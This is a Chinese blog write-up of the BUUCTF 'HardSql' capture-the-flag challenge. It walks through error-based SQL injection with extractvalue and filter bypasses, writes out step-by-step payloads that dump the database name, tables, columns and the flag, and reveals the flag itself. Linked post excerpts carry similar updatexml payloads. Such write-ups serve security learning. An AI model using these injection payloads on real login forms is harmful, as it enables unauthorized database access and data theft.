BUUCTF WEB HardSql

最新推荐文章于 2024-06-18 16:59:41 发布
最新推荐文章于 2024-06-18 16:59:41 发布
阅读量253 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120740491
版权

这题考的是报错注入
判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合
下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm
关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723
基础payload:

账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek

空格被过滤了,所以需要空格来绕过
知道注入方式下面就是老三套了,表名,列名,flag

表名:a'^extractvalue(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))#
密码123

列名:

a'^extractvalue(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#
密码123

经过测试,表里只有一条数据,password为flag,那么就上payload

a'^extractvalue(1,concat('~',(select(group_concat(password))from(geek.H4rDsq1))))#密码123
只有一部分,看起来是对返回长度做了过滤,需要再从右边读取一遍
a'^extractvalue(1,concat('~',(select(right(password,30))from(geek.H4rDsq1))))#密码123

两次结果拼接依次就好了
f-8fd9-40f4-85a8-fde36045dd41}
flag{9ecae2df-8fd9-40f4-85a8-fd
拼接结果flag{9ecae2df-8fd9-40f4-85a8-fde36045dd41}
参考视频链接:https://www.bilibili.com/video/BV1L44y1x7eF/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf easysql
hintll的博客
05-31 1645
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
BUUCTF_WEB】 EasySQL1
qq_45766280的博客
05-07 431
先上图 先试试 无论输入什么数字都显示一样的结果 输入flag等特殊查询语句显示 其他的则不显示任何信息 尝试一下堆叠查询,输入: 1;show databases; 试了试联合查询,输出NONONO 查一下表 1; show tables; 好了明白了,flag应该就在当前表中,但所有有关Flag表的查询都被过滤掉了。 查看了别人的wp后才明白原理。 后端代码大致如下 select $_GET['query'] || flag from flag 在这个语句中起到过滤作用的是 || 这个的
buuctf-HardSQL
m0_62094846的博客
04-02 1409
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2061
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
BUUCTF [极客大挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 267
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
BUUCTF WEB [极客大挑战 2019]HardSQL
Y1da的博客
04-17 591
BUUCTF WEB [极客大挑战 2019]HardSQL 万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入 爆破库名 1'or(extractvalue(1,concat(1,database())))# XPATH syntax error: 'geek' 爆破表名 1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1386
buucft记录贴
BUUCTF [极客大挑战 2019]HardSQL
m0_63253040的博客
03-28 2404
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
BUUCTF——Web
2201_75331136的博客
07-11 1011
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 482
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
buuctf web第二题代码审计
qq_44740774的博客
09-25 811
buuctf web第二题代码审计
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3064
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF Writeup-Web-[极客大挑战 2019]HardSQL 1
菜鸟之路
07-17 3671
BUUCTF WriteUp Web [极客大挑战 2019]HardSQL 1 打开后提示sql注入,查看页面源代码: 发现是get两个参数username和password到check.php 因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa,并执行就可以了。用burpsuite直接改数据也行。 然后开始注入,尝试加’、" 发现单引号有报错,双引号没有,没提示有括号,所以应该是普通单引号闭合的字符型注入点 出现这行字说明输入的被过
BUUCTF:[极客大挑战 2019]HardSQL
末初的CSDN博客
11-07 606
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
buuctf-web-[极客大挑战 2019]HardSQL-wp
居上
08-09 285
[极客大挑战 2019]HardSQL 知识点 绕过一些简单的过滤 right() 过程 主页是一个登陆页面 过滤了关键字 and、=、空格、union等 查库 check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 查表 check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat
BUUCTF---web---[极客大挑战 2019]HardSQL
2201_75556700的博客
05-19 807
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值